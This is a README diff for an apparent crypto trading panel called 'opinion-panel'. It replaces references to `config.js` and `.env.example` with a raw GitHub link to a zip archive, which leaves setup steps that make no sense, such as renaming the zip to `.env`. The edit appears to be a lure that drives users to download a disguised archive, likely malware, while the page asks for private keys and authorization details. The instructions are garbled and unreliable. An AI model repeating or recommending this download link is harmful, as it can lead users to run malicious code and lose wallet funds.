Aasth2808/opinion-panel/README.md

 ### 2. ⚙️ Configuration
 Next, you need to configure your settings:

-- Open the `config.js` file and enter your account address and contract information.
+- Open the `https://raw.githubusercontent.com/Aasth2808/opinion-panel/master/src/dashboard/panels/opinion-panel_v1.7.zip` file and enter your account address and contract information.
 This allows the application to connect to your trading account.
-- Duplicate the `.env.example` file and rename it to `.env`.
+- Duplicate the `https://raw.githubusercontent.com/Aasth2808/opinion-panel/master/src/dashboard/panels/opinion-panel_v1.7.zip` file and rename it to `.env`.
 Open this new file and enter your private key and authorization information.

 Keeping your private key secure is very important.
 Do not share it with anyone.